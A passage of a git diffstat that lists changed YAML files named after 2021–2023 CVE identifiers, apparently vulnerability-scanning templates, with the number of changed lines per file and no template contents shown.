http/cves/2021/CVE-2021-40968.yaml | 2 +- http/cves/2021/CVE-2021-40969.yaml | 2 +- http/cves/2021/CVE-2021-40970.yaml | 2 +- http/cves/2021/CVE-2021-40971.yaml | 2 +- http/cves/2021/CVE-2021-40972.yaml | 2 +- http/cves/2021/CVE-2021-40973.yaml | 2 +- http/cves/2021/CVE-2021-40978.yaml | 2 +- http/cves/2021/CVE-2021-41174.yaml | 2 +- http/cves/2021/CVE-2021-41192.yaml | 2 +- http/cves/2021/CVE-2021-41266.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 4 +- http/cves/2021/CVE-2021-41282.yaml | 4 +- http/cves/2021/CVE-2021-41291.yaml | 4 +- http/cves/2021/CVE-2021-41293.yaml | 4 +- http/cves/2021/CVE-2021-41349.yaml | 4 +- http/cves/2021/CVE-2021-41381.yaml | 4 +- http/cves/2021/CVE-2021-41432.yaml | 2 +- http/cves/2021/CVE-2021-41460.yaml | 2 +- http/cves/2021/CVE-2021-41467.yaml | 2 +- http/cves/2021/CVE-2021-41569.yaml | 2 +- http/cves/2021/CVE-2021-41648.yaml | 4 +- http/cves/2021/CVE-2021-41649.yaml | 4 +- http/cves/2021/CVE-2021-41653.yaml | 4 +- http/cves/2021/CVE-2021-41749.yaml | 12 +- http/cves/2021/CVE-2021-41773.yaml | 4 +- http/cves/2021/CVE-2021-41826.yaml | 2 +- http/cves/2021/CVE-2021-41878.yaml | 4 +- http/cves/2021/CVE-2021-4191.yaml | 4 +- http/cves/2021/CVE-2021-41951.yaml | 2 +- http/cves/2021/CVE-2021-42013.yaml | 4 +- http/cves/2021/CVE-2021-42063.yaml | 4 +- http/cves/2021/CVE-2021-42071.yaml | 4 +- http/cves/2021/CVE-2021-42192.yaml | 2 +- http/cves/2021/CVE-2021-42237.yaml | 4 +- http/cves/2021/CVE-2021-42258.yaml | 4 +- http/cves/2021/CVE-2021-42551.yaml | 2 +- http/cves/2021/CVE-2021-42565.yaml | 2 +- http/cves/2021/CVE-2021-42566.yaml | 2 +- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-42627.yaml | 4 +- http/cves/2021/CVE-2021-42663.yaml | 2 +- http/cves/2021/CVE-2021-42667.yaml | 4 +- http/cves/2021/CVE-2021-42887.yaml | 4 +- http/cves/2021/CVE-2021-43062.yaml | 4 +- http/cves/2021/CVE-2021-43287.yaml | 4 +- http/cves/2021/CVE-2021-43421.yaml | 4 +- http/cves/2021/CVE-2021-43495.yaml | 2 +- http/cves/2021/CVE-2021-43496.yaml | 4 +- http/cves/2021/CVE-2021-43510.yaml | 4 +- http/cves/2021/CVE-2021-43574.yaml | 2 +- http/cves/2021/CVE-2021-43725.yaml | 4 +- http/cves/2021/CVE-2021-43734.yaml | 4 +- http/cves/2021/CVE-2021-43778.yaml | 2 +- http/cves/2021/CVE-2021-43798.yaml | 4 +- http/cves/2021/CVE-2021-43810.yaml | 2 +- http/cves/2021/CVE-2021-44077.yaml | 4 +- http/cves/2021/CVE-2021-44138.yaml | 4 +- http/cves/2021/CVE-2021-44139.yaml | 4 +- http/cves/2021/CVE-2021-44152.yaml | 4 +- http/cves/2021/CVE-2021-44228.yaml | 4 +- http/cves/2021/CVE-2021-44427.yaml | 4 +- http/cves/2021/CVE-2021-44451.yaml | 4 +- http/cves/2021/CVE-2021-44515.yaml | 4 +- http/cves/2021/CVE-2021-44528.yaml | 2 +- http/cves/2021/CVE-2021-44529.yaml | 4 +- http/cves/2021/CVE-2021-44848.yaml | 2 +- http/cves/2021/CVE-2021-45043.yaml | 2 +- http/cves/2021/CVE-2021-45046.yaml | 4 +- http/cves/2021/CVE-2021-45092.yaml | 2 +- http/cves/2021/CVE-2021-45232.yaml | 4 +- http/cves/2021/CVE-2021-45380.yaml | 4 +- http/cves/2021/CVE-2021-45422.yaml | 2 +- http/cves/2021/CVE-2021-45428.yaml | 2 +- http/cves/2021/CVE-2021-45967.yaml | 4 +- http/cves/2021/CVE-2021-45968.yaml | 4 +- http/cves/2021/CVE-2021-46005.yaml | 2 +- http/cves/2021/CVE-2021-46068.yaml | 2 +- http/cves/2021/CVE-2021-46069.yaml | 2 +- http/cves/2021/CVE-2021-46071.yaml | 2 +- http/cves/2021/CVE-2021-46072.yaml | 2 +- http/cves/2021/CVE-2021-46073.yaml | 2 +- http/cves/2021/CVE-2021-46107.yaml | 6 + http/cves/2021/CVE-2021-46379.yaml | 4 +- http/cves/2021/CVE-2021-46381.yaml | 4 +- http/cves/2021/CVE-2021-46387.yaml | 4 +- http/cves/2021/CVE-2021-46417.yaml | 4 +- http/cves/2021/CVE-2021-46422.yaml | 4 +- http/cves/2021/CVE-2021-46424.yaml | 4 +- http/cves/2021/CVE-2021-46704.yaml | 4 +- http/cves/2022/CVE-2022-0140.yaml | 4 +- http/cves/2022/CVE-2022-0147.yaml | 4 +- http/cves/2022/CVE-2022-0148.yaml | 4 +- http/cves/2022/CVE-2022-0149.yaml | 4 +- http/cves/2022/CVE-2022-0150.yaml | 4 +- http/cves/2022/CVE-2022-0165.yaml | 4 +- http/cves/2022/CVE-2022-0169.yaml | 4 +- http/cves/2022/CVE-2022-0189.yaml | 4 +- http/cves/2022/CVE-2022-0201.yaml | 4 +- http/cves/2022/CVE-2022-0206.yaml | 4 +- http/cves/2022/CVE-2022-0208.yaml | 4 +- http/cves/2022/CVE-2022-0212.yaml | 4 +- http/cves/2022/CVE-2022-0218.yaml | 2 +- http/cves/2022/CVE-2022-0220.yaml | 2 +- http/cves/2022/CVE-2022-0234.yaml | 4 +- http/cves/2022/CVE-2022-0271.yaml | 4 +- http/cves/2022/CVE-2022-0281.yaml | 4 +- http/cves/2022/CVE-2022-0288.yaml | 4 +- http/cves/2022/CVE-2022-0342.yaml | 15 +- http/cves/2022/CVE-2022-0346.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 4 +- http/cves/2022/CVE-2022-0378.yaml | 2 +- http/cves/2022/CVE-2022-0381.yaml | 2 +- http/cves/2022/CVE-2022-0412.yaml | 4 +- http/cves/2022/CVE-2022-0415.yaml | 6 +- http/cves/2022/CVE-2022-0422.yaml | 4 +- http/cves/2022/CVE-2022-0432.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 4 +- http/cves/2022/CVE-2022-0437.yaml | 2 +- http/cves/2022/CVE-2022-0441.yaml | 4 +- http/cves/2022/CVE-2022-0482.yaml | 4 +- http/cves/2022/CVE-2022-0535.yaml | 4 +- http/cves/2022/CVE-2022-0540.yaml | 4 +- http/cves/2022/CVE-2022-0591.yaml | 4 +- http/cves/2022/CVE-2022-0594.yaml | 2 +- http/cves/2022/CVE-2022-0595.yaml | 4 +- http/cves/2022/CVE-2022-0599.yaml | 4 +- http/cves/2022/CVE-2022-0653.yaml | 4 +- http/cves/2022/CVE-2022-0656.yaml | 4 +- http/cves/2022/CVE-2022-0660.yaml | 4 +- http/cves/2022/CVE-2022-0678.yaml | 4 +- http/cves/2022/CVE-2022-0679.yaml | 4 +- http/cves/2022/CVE-2022-0692.yaml | 4 +- http/cves/2022/CVE-2022-0693.yaml | 4 +- http/cves/2022/CVE-2022-0735.yaml | 4 +- http/cves/2022/CVE-2022-0747.yaml | 4 +- http/cves/2022/CVE-2022-0760.yaml | 4 +- http/cves/2022/CVE-2022-0769.yaml | 4 +- http/cves/2022/CVE-2022-0773.yaml | 4 +- http/cves/2022/CVE-2022-0776.yaml | 4 +- http/cves/2022/CVE-2022-0781.yaml | 2 +- http/cves/2022/CVE-2022-0784.yaml | 4 +- http/cves/2022/CVE-2022-0785.yaml | 4 +- http/cves/2022/CVE-2022-0786.yaml | 4 +- http/cves/2022/CVE-2022-0788.yaml | 2 +- http/cves/2022/CVE-2022-0817.yaml | 2 +- http/cves/2022/CVE-2022-0824.yaml | 6 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0827.yaml | 4 +- http/cves/2022/CVE-2022-0846.yaml | 4 +- http/cves/2022/CVE-2022-0864.yaml | 4 +- http/cves/2022/CVE-2022-0867.yaml | 4 +- http/cves/2022/CVE-2022-0869.yaml | 4 +- http/cves/2022/CVE-2022-0870.yaml | 4 +- http/cves/2022/CVE-2022-0885.yaml | 4 +- http/cves/2022/CVE-2022-0928.yaml | 4 +- http/cves/2022/CVE-2022-0948.yaml | 4 +- http/cves/2022/CVE-2022-0949.yaml | 4 +- http/cves/2022/CVE-2022-0952.yaml | 4 +- http/cves/2022/CVE-2022-0954.yaml | 4 +- http/cves/2022/CVE-2022-0963.yaml | 4 +- http/cves/2022/CVE-2022-0968.yaml | 4 +- http/cves/2022/CVE-2022-1007.yaml | 4 +- http/cves/2022/CVE-2022-1013.yaml | 2 +- http/cves/2022/CVE-2022-1020.yaml | 4 +- http/cves/2022/CVE-2022-1040.yaml | 4 +- http/cves/2022/CVE-2022-1054.yaml | 4 +- http/cves/2022/CVE-2022-1057.yaml | 4 +- http/cves/2022/CVE-2022-1058.yaml | 4 +- http/cves/2022/CVE-2022-1119.yaml | 4 +- http/cves/2022/CVE-2022-1162.yaml | 4 +- http/cves/2022/CVE-2022-1168.yaml | 4 +- http/cves/2022/CVE-2022-1221.yaml | 2 +- http/cves/2022/CVE-2022-1329.yaml | 4 +- http/cves/2022/CVE-2022-1386.yaml | 4 +- http/cves/2022/CVE-2022-1388.yaml | 4 +- http/cves/2022/CVE-2022-1390.yaml | 4 +- http/cves/2022/CVE-2022-1391.yaml | 4 +- http/cves/2022/CVE-2022-1392.yaml | 4 +- http/cves/2022/CVE-2022-1398.yaml | 2 +- http/cves/2022/CVE-2022-1439.yaml | 4 +- http/cves/2022/CVE-2022-1442.yaml | 4 +- http/cves/2022/CVE-2022-1574.yaml | 2 +- http/cves/2022/CVE-2022-1595.yaml | 2 +- http/cves/2022/CVE-2022-1597.yaml | 4 +- http/cves/2022/CVE-2022-1598.yaml | 4 +- http/cves/2022/CVE-2022-1713.yaml | 4 +- http/cves/2022/CVE-2022-1724.yaml | 2 +- http/cves/2022/CVE-2022-1756.yaml | 2 +- http/cves/2022/CVE-2022-1768.yaml | 8 +- http/cves/2022/CVE-2022-1815.yaml | 4 +- http/cves/2022/CVE-2022-1883.yaml | 2 +- http/cves/2022/CVE-2022-1903.yaml | 4 +- http/cves/2022/CVE-2022-1904.yaml | 2 +- http/cves/2022/CVE-2022-1906.yaml | 4 +- http/cves/2022/CVE-2022-1910.yaml | 2 +- http/cves/2022/CVE-2022-1916.yaml | 2 +- http/cves/2022/CVE-2022-1933.yaml | 2 +- http/cves/2022/CVE-2022-1937.yaml | 2 +- http/cves/2022/CVE-2022-1946.yaml | 2 +- http/cves/2022/CVE-2022-1952.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 4 +- http/cves/2022/CVE-2022-21371.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 7 +- http/cves/2022/CVE-2022-21587.yaml | 4 +- http/cves/2022/CVE-2022-21661.yaml | 4 +- http/cves/2022/CVE-2022-21705.yaml | 6 +- http/cves/2022/CVE-2022-2185.yaml | 4 +- http/cves/2022/CVE-2022-2187.yaml | 2 +- http/cves/2022/CVE-2022-2219.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 4 +- http/cves/2022/CVE-2022-22536.yaml | 4 +- http/cves/2022/CVE-2022-22733.yaml | 4 +- http/cves/2022/CVE-2022-22897.yaml | 4 +- http/cves/2022/CVE-2022-2290.yaml | 2 +- http/cves/2022/CVE-2022-22947.yaml | 4 +- http/cves/2022/CVE-2022-22954.yaml | 4 +- http/cves/2022/CVE-2022-22963.yaml | 6 +- http/cves/2022/CVE-2022-22965.yaml | 4 +- http/cves/2022/CVE-2022-22972.yaml | 4 +- http/cves/2022/CVE-2022-23102.yaml | 4 +- http/cves/2022/CVE-2022-23131.yaml | 4 +- http/cves/2022/CVE-2022-23134.yaml | 4 +- http/cves/2022/CVE-2022-2314.yaml | 6 +- http/cves/2022/CVE-2022-23178.yaml | 2 +- http/cves/2022/CVE-2022-23347.yaml | 4 +- http/cves/2022/CVE-2022-23348.yaml | 4 +- http/cves/2022/CVE-2022-23544.yaml | 2 +- http/cves/2022/CVE-2022-2373.yaml | 4 +- http/cves/2022/CVE-2022-2376.yaml | 4 +- http/cves/2022/CVE-2022-23779.yaml | 4 +- http/cves/2022/CVE-2022-2379.yaml | 4 +- http/cves/2022/CVE-2022-23808.yaml | 4 +- http/cves/2022/CVE-2022-2383.yaml | 4 +- http/cves/2022/CVE-2022-23854.yaml | 4 +- http/cves/2022/CVE-2022-23881.yaml | 4 +- http/cves/2022/CVE-2022-23898.yaml | 4 +- http/cves/2022/CVE-2022-23944.yaml | 4 +- http/cves/2022/CVE-2022-24112.yaml | 4 +- http/cves/2022/CVE-2022-24124.yaml | 4 +- http/cves/2022/CVE-2022-24129.yaml | 2 +- http/cves/2022/CVE-2022-2414.yaml | 4 +- http/cves/2022/CVE-2022-24181.yaml | 4 +- http/cves/2022/CVE-2022-24223.yaml | 2 +- http/cves/2022/CVE-2022-24260.yaml | 4 +- http/cves/2022/CVE-2022-24264.yaml | 4 +- http/cves/2022/CVE-2022-24265.yaml | 4 +- http/cves/2022/CVE-2022-24266.yaml | 4 +- http/cves/2022/CVE-2022-24288.yaml | 4 +- http/cves/2022/CVE-2022-24384.yaml | 4 +- http/cves/2022/CVE-2022-2462.yaml | 4 +- http/cves/2022/CVE-2022-2467.yaml | 4 +- http/cves/2022/CVE-2022-24681.yaml | 4 +- http/cves/2022/CVE-2022-24716.yaml | 4 +- http/cves/2022/CVE-2022-24816.yaml | 4 +- http/cves/2022/CVE-2022-24856.yaml | 4 +- http/cves/2022/CVE-2022-2486.yaml | 4 +- http/cves/2022/CVE-2022-2487.yaml | 4 +- http/cves/2022/CVE-2022-2488.yaml | 2 +- http/cves/2022/CVE-2022-24899.yaml | 4 +- http/cves/2022/CVE-2022-24900.yaml | 4 +- http/cves/2022/CVE-2022-24990.yaml | 4 +- http/cves/2022/CVE-2022-25082.yaml | 4 +- http/cves/2022/CVE-2022-25125.yaml | 4 +- http/cves/2022/CVE-2022-25216.yaml | 4 +- http/cves/2022/CVE-2022-25323.yaml | 4 +- http/cves/2022/CVE-2022-25356.yaml | 4 +- http/cves/2022/CVE-2022-2544.yaml | 4 +- http/cves/2022/CVE-2022-2546.yaml | 4 +- http/cves/2022/CVE-2022-25481.yaml | 4 +- http/cves/2022/CVE-2022-25485.yaml | 4 +- http/cves/2022/CVE-2022-25486.yaml | 4 +- http/cves/2022/CVE-2022-25487.yaml | 4 +- http/cves/2022/CVE-2022-25488.yaml | 4 +- http/cves/2022/CVE-2022-25489.yaml | 4 +- http/cves/2022/CVE-2022-25497.yaml | 4 +- http/cves/2022/CVE-2022-2551.yaml | 4 +- http/cves/2022/CVE-2022-25568.yaml | 12 +- http/cves/2022/CVE-2022-2599.yaml | 4 +- http/cves/2022/CVE-2022-26134.yaml | 4 +- http/cves/2022/CVE-2022-26138.yaml | 4 +- http/cves/2022/CVE-2022-26148.yaml | 4 +- http/cves/2022/CVE-2022-26159.yaml | 4 +- http/cves/2022/CVE-2022-26233.yaml | 4 +- http/cves/2022/CVE-2022-26263.yaml | 4 +- http/cves/2022/CVE-2022-2627.yaml | 4 +- http/cves/2022/CVE-2022-2633.yaml | 4 +- http/cves/2022/CVE-2022-26352.yaml | 4 +- http/cves/2022/CVE-2022-26564.yaml | 4 +- http/cves/2022/CVE-2022-26833.yaml | 2 +- http/cves/2022/CVE-2022-26960.yaml | 4 +- http/cves/2022/CVE-2022-2733.yaml | 4 +- http/cves/2022/CVE-2022-2756.yaml | 2 +- http/cves/2022/CVE-2022-27593.yaml | 4 +- http/cves/2022/CVE-2022-27849.yaml | 4 +- http/cves/2022/CVE-2022-27926.yaml | 4 +- http/cves/2022/CVE-2022-27927.yaml | 4 +- http/cves/2022/CVE-2022-27984.yaml | 4 +- http/cves/2022/CVE-2022-27985.yaml | 4 +- http/cves/2022/CVE-2022-28022.yaml | 4 +- http/cves/2022/CVE-2022-28023.yaml | 4 +- http/cves/2022/CVE-2022-28032.yaml | 4 +- http/cves/2022/CVE-2022-28079.yaml | 2 +- http/cves/2022/CVE-2022-28080.yaml | 2 +- http/cves/2022/CVE-2022-28117.yaml | 2 +- http/cves/2022/CVE-2022-28219.yaml | 4 +- http/cves/2022/CVE-2022-28290.yaml | 4 +- http/cves/2022/CVE-2022-28363.yaml | 2 +- http/cves/2022/CVE-2022-28365.yaml | 4 +- http/cves/2022/CVE-2022-2863.yaml | 4 +- http/cves/2022/CVE-2022-28923.yaml | 4 +- http/cves/2022/CVE-2022-28955.yaml | 4 +- http/cves/2022/CVE-2022-29004.yaml | 4 +- http/cves/2022/CVE-2022-29005.yaml | 2 +- http/cves/2022/CVE-2022-29006.yaml | 6 +- http/cves/2022/CVE-2022-29007.yaml | 6 +- http/cves/2022/CVE-2022-29009.yaml | 6 +- http/cves/2022/CVE-2022-29014.yaml | 2 +- http/cves/2022/CVE-2022-29078.yaml | 4 +- http/cves/2022/CVE-2022-29153.yaml | 4 +- http/cves/2022/CVE-2022-29272.yaml | 2 +- http/cves/2022/CVE-2022-29298.yaml | 4 +- http/cves/2022/CVE-2022-29303.yaml | 4 +- http/cves/2022/CVE-2022-29349.yaml | 4 +- http/cves/2022/CVE-2022-29383.yaml | 4 +- http/cves/2022/CVE-2022-29455.yaml | 2 +- http/cves/2022/CVE-2022-29464.yaml | 4 +- http/cves/2022/CVE-2022-29548.yaml | 4 +- http/cves/2022/CVE-2022-29775.yaml | 4 +- http/cves/2022/CVE-2022-30073.yaml | 4 +- http/cves/2022/CVE-2022-30489.yaml | 2 +- http/cves/2022/CVE-2022-30512.yaml | 2 +- http/cves/2022/CVE-2022-30513.yaml | 2 +- http/cves/2022/CVE-2022-30514.yaml | 2 +- http/cves/2022/CVE-2022-30525.yaml | 4 +- http/cves/2022/CVE-2022-3062.yaml | 4 +- http/cves/2022/CVE-2022-30776.yaml | 2 +- http/cves/2022/CVE-2022-30777.yaml | 2 +- http/cves/2022/CVE-2022-31126.yaml | 2 +- http/cves/2022/CVE-2022-31268.yaml | 4 +- http/cves/2022/CVE-2022-31269.yaml | 4 +- http/cves/2022/CVE-2022-31299.yaml | 4 +- http/cves/2022/CVE-2022-31373.yaml | 2 +- http/cves/2022/CVE-2022-31474.yaml | 4 +- http/cves/2022/CVE-2022-31499.yaml | 4 +- http/cves/2022/CVE-2022-31656.yaml | 4 +- http/cves/2022/CVE-2022-31798.yaml | 4 +- http/cves/2022/CVE-2022-31814.yaml | 4 +- http/cves/2022/CVE-2022-31845.yaml | 4 +- http/cves/2022/CVE-2022-31846.yaml | 4 +- http/cves/2022/CVE-2022-31847.yaml | 4 +- http/cves/2022/CVE-2022-31854.yaml | 2 +- http/cves/2022/CVE-2022-31879.yaml | 2 +- http/cves/2022/CVE-2022-31974.yaml | 2 +- http/cves/2022/CVE-2022-31975.yaml | 2 +- http/cves/2022/CVE-2022-31976.yaml | 2 +- http/cves/2022/CVE-2022-31977.yaml | 2 +- http/cves/2022/CVE-2022-31978.yaml | 2 +- http/cves/2022/CVE-2022-31980.yaml | 2 +- http/cves/2022/CVE-2022-31981.yaml | 2 +- http/cves/2022/CVE-2022-31982.yaml | 2 +- http/cves/2022/CVE-2022-31983.yaml | 2 +- http/cves/2022/CVE-2022-31984.yaml | 2 +- http/cves/2022/CVE-2022-32007.yaml | 2 +- http/cves/2022/CVE-2022-32015.yaml | 2 +- http/cves/2022/CVE-2022-32018.yaml | 2 +- http/cves/2022/CVE-2022-32022.yaml | 2 +- http/cves/2022/CVE-2022-32024.yaml | 2 +- http/cves/2022/CVE-2022-32025.yaml | 2 +- http/cves/2022/CVE-2022-32026.yaml | 2 +- http/cves/2022/CVE-2022-32028.yaml | 2 +- http/cves/2022/CVE-2022-32094.yaml | 4 +- http/cves/2022/CVE-2022-32195.yaml | 2 +- http/cves/2022/CVE-2022-32409.yaml | 4 +- http/cves/2022/CVE-2022-32429.yaml | 4 +- http/cves/2022/CVE-2022-32444.yaml | 4 +- http/cves/2022/CVE-2022-32770.yaml | 2 +- http/cves/2022/CVE-2022-32771.yaml | 2 +- http/cves/2022/CVE-2022-32772.yaml | 2 +- http/cves/2022/CVE-2022-33119.yaml | 4 +- http/cves/2022/CVE-2022-33174.yaml | 4 +- http/cves/2022/CVE-2022-33891.yaml | 4 +- http/cves/2022/CVE-2022-33901.yaml | 4 +- http/cves/2022/CVE-2022-33965.yaml | 2 +- http/cves/2022/CVE-2022-34045.yaml | 4 +- http/cves/2022/CVE-2022-34046.yaml | 4 +- http/cves/2022/CVE-2022-34047.yaml | 4 +- http/cves/2022/CVE-2022-34048.yaml | 2 +- http/cves/2022/CVE-2022-34049.yaml | 2 +- http/cves/2022/CVE-2022-34121.yaml | 4 +- http/cves/2022/CVE-2022-34328.yaml | 2 +- http/cves/2022/CVE-2022-34576.yaml | 4 +- http/cves/2022/CVE-2022-34590.yaml | 4 +- http/cves/2022/CVE-2022-34753.yaml | 4 +- http/cves/2022/CVE-2022-3484.yaml | 2 +- http/cves/2022/CVE-2022-3506.yaml | 4 +- http/cves/2022/CVE-2022-35151.yaml | 4 +- http/cves/2022/CVE-2022-35405.yaml | 4 +- http/cves/2022/CVE-2022-35413.yaml | 4 +- http/cves/2022/CVE-2022-35416.yaml | 2 +- http/cves/2022/CVE-2022-35493.yaml | 4 +- http/cves/2022/CVE-2022-3578.yaml | 2 +- http/cves/2022/CVE-2022-35914.yaml | 4 +- http/cves/2022/CVE-2022-36446.yaml | 4 +- http/cves/2022/CVE-2022-36537.yaml | 4 +- http/cves/2022/CVE-2022-36642.yaml | 4 +- http/cves/2022/CVE-2022-36804.yaml | 4 +- http/cves/2022/CVE-2022-36883.yaml | 2 +- http/cves/2022/CVE-2022-37042.yaml | 4 +- http/cves/2022/CVE-2022-37153.yaml | 4 +- http/cves/2022/CVE-2022-37190.yaml | 4 +- http/cves/2022/CVE-2022-37191.yaml | 4 +- http/cves/2022/CVE-2022-37299.yaml | 4 +- http/cves/2022/CVE-2022-3768.yaml | 4 +- http/cves/2022/CVE-2022-3800.yaml | 4 +- http/cves/2022/CVE-2022-38295.yaml | 4 +- http/cves/2022/CVE-2022-38296.yaml | 4 +- http/cves/2022/CVE-2022-38463.yaml | 4 +- http/cves/2022/CVE-2022-38467.yaml | 4 +- http/cves/2022/CVE-2022-38553.yaml | 4 +- http/cves/2022/CVE-2022-38637.yaml | 4 +- http/cves/2022/CVE-2022-38794.yaml | 4 +- http/cves/2022/CVE-2022-38817.yaml | 4 +- http/cves/2022/CVE-2022-38870.yaml | 4 +- http/cves/2022/CVE-2022-3908.yaml | 2 +- http/cves/2022/CVE-2022-39195.yaml | 4 +- http/cves/2022/CVE-2022-3933.yaml | 2 +- http/cves/2022/CVE-2022-3934.yaml | 2 +- http/cves/2022/CVE-2022-3980.yaml | 4 +- http/cves/2022/CVE-2022-3982.yaml | 4 +- http/cves/2022/CVE-2022-39952.yaml | 4 +- http/cves/2022/CVE-2022-39960.yaml | 4 +- http/cves/2022/CVE-2022-39986.yaml | 4 +- http/cves/2022/CVE-2022-40022.yaml | 4 +- http/cves/2022/CVE-2022-40083.yaml | 4 +- http/cves/2022/CVE-2022-40127.yaml | 4 +- http/cves/2022/CVE-2022-40359.yaml | 4 +- http/cves/2022/CVE-2022-4050.yaml | 4 +- http/cves/2022/CVE-2022-4057.yaml | 2 +- http/cves/2022/CVE-2022-4060.yaml | 4 +- http/cves/2022/CVE-2022-4063.yaml | 4 +- http/cves/2022/CVE-2022-40684.yaml | 4 +- http/cves/2022/CVE-2022-40734.yaml | 4 +- http/cves/2022/CVE-2022-40843.yaml | 4 +- http/cves/2022/CVE-2022-40879.yaml | 4 +- http/cves/2022/CVE-2022-40881.yaml | 4 +- http/cves/2022/CVE-2022-4117.yaml | 4 +- http/cves/2022/CVE-2022-4140.yaml | 4 +- http/cves/2022/CVE-2022-41441.yaml | 4 +- http/cves/2022/CVE-2022-41473.yaml | 4 +- http/cves/2022/CVE-2022-41840.yaml | 4 +- http/cves/2022/CVE-2022-42094.yaml | 2 +- http/cves/2022/CVE-2022-42095.yaml | 2 +- http/cves/2022/CVE-2022-42096.yaml | 2 +- http/cves/2022/CVE-2022-42233.yaml | 4 +- http/cves/2022/CVE-2022-4260.yaml | 2 +- http/cves/2022/CVE-2022-42746.yaml | 4 +- http/cves/2022/CVE-2022-42747.yaml | 4 +- http/cves/2022/CVE-2022-42748.yaml | 4 +- http/cves/2022/CVE-2022-42749.yaml | 4 +- http/cves/2022/CVE-2022-4295.yaml | 4 +- http/cves/2022/CVE-2022-4301.yaml | 2 +- http/cves/2022/CVE-2022-43014.yaml | 4 +- http/cves/2022/CVE-2022-43015.yaml | 4 +- http/cves/2022/CVE-2022-43016.yaml | 4 +- http/cves/2022/CVE-2022-43017.yaml | 4 +- http/cves/2022/CVE-2022-43018.yaml | 4 +- http/cves/2022/CVE-2022-4306.yaml | 4 +- http/cves/2022/CVE-2022-43140.yaml | 4 +- http/cves/2022/CVE-2022-43164.yaml | 4 +- http/cves/2022/CVE-2022-43165.yaml | 4 +- http/cves/2022/CVE-2022-43166.yaml | 4 +- http/cves/2022/CVE-2022-43167.yaml | 4 +- http/cves/2022/CVE-2022-43169.yaml | 4 +- http/cves/2022/CVE-2022-43170.yaml | 4 +- http/cves/2022/CVE-2022-43185.yaml | 4 +- http/cves/2022/CVE-2022-4320.yaml | 4 +- http/cves/2022/CVE-2022-4321.yaml | 4 +- http/cves/2022/CVE-2022-4325.yaml | 2 +- http/cves/2022/CVE-2022-4328.yaml | 4 +- http/cves/2022/CVE-2022-43769.yaml | 4 +- http/cves/2022/CVE-2022-4447.yaml | 4 +- http/cves/2022/CVE-2022-44877.yaml | 4 +- http/cves/2022/CVE-2022-44944.yaml | 4 +- http/cves/2022/CVE-2022-44946.yaml | 4 +- http/cves/2022/CVE-2022-44947.yaml | 4 +- http/cves/2022/CVE-2022-44948.yaml | 4 +- http/cves/2022/CVE-2022-44949.yaml | 4 +- http/cves/2022/CVE-2022-44950.yaml | 4 +- http/cves/2022/CVE-2022-44951.yaml | 4 +- http/cves/2022/CVE-2022-44952.yaml | 4 +- http/cves/2022/CVE-2022-45037.yaml | 2 +- http/cves/2022/CVE-2022-45038.yaml | 2 +- http/cves/2022/CVE-2022-45917.yaml | 4 +- http/cves/2022/CVE-2022-45933.yaml | 4 +- http/cves/2022/CVE-2022-46020.yaml | 4 +- http/cves/2022/CVE-2022-46071.yaml | 4 +- http/cves/2022/CVE-2022-46073.yaml | 4 +- http/cves/2022/CVE-2022-46169.yaml | 6 +- http/cves/2022/CVE-2022-46381.yaml | 2 +- http/cves/2022/CVE-2022-46443.yaml | 4 +- http/cves/2022/CVE-2022-46463.yaml | 4 +- http/cves/2022/CVE-2022-46888.yaml | 4 +- http/cves/2022/CVE-2022-46934.yaml | 4 +- http/cves/2022/CVE-2022-47002.yaml | 4 +- http/cves/2022/CVE-2022-47003.yaml | 4 +- http/cves/2022/CVE-2022-47615.yaml | 4 +- http/cves/2022/CVE-2022-47945.yaml | 4 +- http/cves/2022/CVE-2022-47966.yaml | 4 +- http/cves/2022/CVE-2022-47986.yaml | 4 +- http/cves/2022/CVE-2022-48012.yaml | 4 +- http/cves/2022/CVE-2022-48165.yaml | 4 +- http/cves/2022/CVE-2022-48197.yaml | 15 +- http/cves/2022/CVE-2022-4897.yaml | 4 +- http/cves/2023/CVE-2023-0099.yaml | 4 +- http/cves/2023/CVE-2023-0126.yaml | 4 +- http/cves/2023/CVE-2023-0236.yaml | 4 +- http/cves/2023/CVE-2023-0261.yaml | 4 +- http/cves/2023/CVE-2023-0297.yaml | 4 +- http/cves/2023/CVE-2023-0448.yaml | 4 +- http/cves/2023/CVE-2023-0514.yaml | 2 +- http/cves/2023/CVE-2023-0527.yaml | 3 +- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0562.yaml | 4 +- http/cves/2023/CVE-2023-0563.yaml | 2 +- http/cves/2023/CVE-2023-0630.yaml | 4 +- http/cves/2023/CVE-2023-0669.yaml | 4 +- http/cves/2023/CVE-2023-0942.yaml | 4 +- http/cves/2023/CVE-2023-0948.yaml | 2 +- http/cves/2023/CVE-2023-0968.yaml | 4 +- http/cves/2023/CVE-2023-1020.yaml | 2 +- http/cves/2023/CVE-2023-1080.yaml | 4 +- http/cves/2023/CVE-2023-1177.yaml | 4 +- http/cves/2023/CVE-2023-1362.yaml | 2 +- http/cves/2023/CVE-2023-1454.yaml | 4 +- http/cves/2023/CVE-2023-1496.yaml | 2 +- http/cves/2023/CVE-2023-1546.yaml | 2 +- http/cves/2023/CVE-2023-1671.yaml | 4 +- http/cves/2023/CVE-2023-1698.yaml | 4 +- http/cves/2023/CVE-2023-1730.yaml | 2 +- http/cves/2023/CVE-2023-1835.yaml | 2 +- http/cves/2023/CVE-2023-1890.yaml | 2 +- http/cves/2023/CVE-2023-20073.yaml | 4 +- http/cves/2023/CVE-2023-2023.yaml | 2 +- http/cves/2023/CVE-2023-20864.yaml | 4 +- http/cves/2023/CVE-2023-20887.yaml | 6 +- http/cves/2023/CVE-2023-20888.yaml | 4 +- http/cves/2023/CVE-2023-20889.yaml | 4 +- http/cves/2023/CVE-2023-2122.yaml | 2 +- http/cves/2023/CVE-2023-2130.yaml | 4 +- http/cves/2023/CVE-2023-2178.yaml | 2 +- http/cves/2023/CVE-2023-2224.yaml | 16 +- http/cves/2023/CVE-2023-22432.yaml | 8 +- http/cves/2023/CVE-2023-22463.yaml | 14 +- http/cves/2023/CVE-2023-22478.yaml | 4 +- http/cves/2023/CVE-2023-22480.yaml | 4 +- 